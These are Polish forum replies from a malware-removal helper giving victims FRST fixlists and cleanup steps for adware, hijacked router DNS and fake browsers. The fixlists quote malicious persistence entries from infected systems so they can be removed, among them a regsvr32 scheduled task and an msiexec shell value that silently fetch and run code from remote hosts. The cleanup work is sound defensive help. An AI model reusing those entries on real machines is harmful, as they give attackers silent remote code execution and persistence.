System został zainfekowany przez adware podmieniające Publsihera, siedzi to w Powłoce startowej oraz w Harmonogramie zadań. Głównym problem jest tutaj jednak infekcja routera, a raczej jego adresów. Ustawione adresy są zagraniczne - jeden z Holandii (KLIK) - drugi z Hong Kongu (KLIK). Uznaję to za niedomyślną modyfikację i przechodzę do jej usunięcia. 1. Zaloguj się do routera: Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4 Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Dopiero gdy router zostanie wyczyszczony i zabezpieczony przejdź do wykonywania poniższych działań. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {29D11A6F-5938-4D30-B16F-3E4C17086C43} - \dKOivBAxh2jP -> Brak pliku Task: {31C0FC9C-40BF-4490-861F-C8D4CF479986} - \Deqise -> Brak pliku Task: {7510C4BD-D08C-4A03-9856-1E49D84E94A2} - \{23206F16-948B-D8BD-AA78-5AE1CCCDC7F2} -> Brak pliku Task: {7B12CC1B-E5B9-422B-AE3B-237556C33ABF} - \{EAC84D92-D3FB-220A-8FA8-DFD354A5DC58} -> Brak pliku Task: {93EA8CF2-2A80-4E85-BFC8-538590B24B7A} - \{7F7D7947-0804-0578-0E11-780F7A7E110E} -> Brak pliku Task: {FB8E46F4-C615-4580-9DA6-CCC4C2068EEB} - System32\Tasks\Perkettimise Collector => C:\Program Files (x86)\Kjoght\xarapoy.exe [2017-04-21] (Google Inc.) C:\Program Files (x86)\Kjoght C:\Program Files (x86)\Kjoght_ ShellExecuteHooks: Brak nazwy - {35C42D40-2348-11E7-B85A-64006A5CFC23} - C:\Users\mateusz\AppData\Roaming\Cehichrocerch\Ghailesewaent.dll -> Brak pliku C:\Users\mateusz\AppData\Roaming\Cehichrocerch ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku SearchScopes: HKLM -> DefaultScope - brak wartości SearchScopes: HKU\S-1-5-21-3466041570-3147851122-1273507371-1001 -> {3461B49C-F1F6-479B-BDA6-610E768D8F78} URL = SearchScopes: HKU\S-1-5-21-3466041570-3147851122-1273507371-1001 -> {ielnksrch} URL = FF SelectedSearchEngine: Mozilla\Firefox\Profiles\g52mj76t.default -> FF Keyword.URL: Mozilla\Firefox\Profiles\g52mj76t.default -> hxxp://www-searching.com/search.aspx?site=shdefault1&prd=smw&pid=s&shr=d&q={searchTerms}&s=H4Lzbcnbl1AU,91a0034a-7354-4ca9-b6e0-56e1596c18df, S3 VGPU; System32\drivers\rdvgkmd.sys [X] CMD: ipconfig /flushdns EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

System jest zainfekowany przez adware. Widoczne są dwie fałszywe wyszukiwarki podszywające się pod Google Chrome oraz Mozilla FireFox (której nawet nie ma zainstalowanej w systemie). Oprócz tego inne adware: uruchamiające strony w przeglądarce, nakładające blokady typu Debugger etc. W systemie sprzątam, kasuję infekcję, resztki po programach i czyszczę pliki tymczasowe. Instalkę z DobrychProgramów mającą Asystena Pobierania kasuję z katalogu Pobrane. Ten instalator ma zintegrowane adware i kto wie czy to właśnie nie on doprowadził do infekcji - KLIK. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Hotben RemoveDirectory: C:\Users\Janusz\AppData\Local\Hotben Task: {0799A11B-BBCE-415E-8524-1C733F6F6689} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {2524CC03-F09A-46EF-892D-6174963B19D8} - \WPD\SqmUpload_S-1-5-21-2487835237-2257990825-3517168332-1001 -> Brak pliku Task: {44AF63F8-B7C5-4730-95AD-D0365E220B1F} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {77F28D2F-FA47-4C2C-B721-7C270588F307} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {9BF3A04E-404B-433E-A4D6-788369AFB24C} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {B9962562-7BA3-446C-8C2D-1001B91445AE} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {F0B467EC-C9B6-4E2A-8020-CDD154D3C6BD} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1QMkZWNTYcRTI1FjE8N8E4MdQYM8UcMYU1MThQM8MdNq== scrobj.dll C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{F2A4227C-2518-4FD8-8BF8-7B4F21DDD335}] => (Allow) C:\Program Files (x86)\Hotben\Application\chrome.exe FirewallRules: [{A21039B9-F973-45F9-9E02-6D0CAA4F2841}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{AA08C75C-F2DB-4174-B872-5B02748EAF9E}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Janusz\AppData\Local\Firefox RemoveDirectory: C:\Users\Janusz\AppData\Roaming\Firefox R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [117424 2017-04-18] () HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QMkZWNTYcRTI1FjE8N8E4MdQYM8UcMYU1MThQM8MdNq== /q IFEO\taskmgr.exe: [Debugger] SearchScopes: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001 -> DefaultScope {32B7ACE0-EDCA-4E79-B5E3-263115A9A6F8} URL = SearchScopes: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001 -> {32B7ACE0-EDCA-4E79-B5E3-263115A9A6F8} URL = HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) U2 Kitty; C:\Users\Janusz\AppData\Local\Kitty\Kitty.dll [754688 2017-04-17] (kitty.exe) [brak podpisu cyfrowego] R2 WindowsAppVerifierSvr; C:\ProgramData\Windows\App\Kit\ApplicationVerifier.dll [107008 2017-04-18] () [brak podpisu cyfrowego] S2 HWDeviceService64.exe; "C:\ProgramData\DatacardService\HWDeviceService64.exe" -/service [X] U3 ugldipob; C:\Users\Janusz\AppData\Local\Temp\ugldipob.sys [56584 2017-04-24] (GMER) [brak podpisu cyfrowego] S3 ew_hwusbdev; \SystemRoot\system32\DRIVERS\ew_hwusbdev.sys [X] S3 ew_usbenumfilter; \SystemRoot\System32\drivers\ew_usbenumfilter.sys [X] S3 huawei_cdcacm; \SystemRoot\system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_ext_ctrl; \SystemRoot\System32\drivers\ew_juextctrl.sys [X] S3 huawei_wwanecm; \SystemRoot\System32\drivers\ew_juwwanecm.sys [X] 2017-04-06 12:42 - 2017-04-06 12:42 - 01255768 _____ ( ) C:\Users\Janusz\Downloads\Skype-13018-AsystentPobierania.exe C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.Studios.PinballFx2_8wekyb3d8bbwe\Pinball.App.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Janusz\AppData\Local\Mozilla C:\Users\Janusz\AppData\Roaming\Mozilla C:\Users\Janusz\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Ustaw tą lub jakąkolwiek inną zaufaną przeglądarkę jako domyślną - skromnie sugeruję Google Chrome - KLIK. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). hotben;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

1. MBAM znalazł tylko resztki po WinThruster - wszystko daj do kasacji. 2. Podsumuj obecny stan systemu.

Odpowiem jutro, tj. pisałem Ci na prywatnej wiadomości.

A gdzie plik Fixlog? Co do wyniku Malwarebytes - nic szczególnego, on po prostu liczby każdy plik osobno. Np. w zainfekowanym profilu może być plik z historią wyszukiwania 1000 fraz i to już jest liczone jako zagrożenie.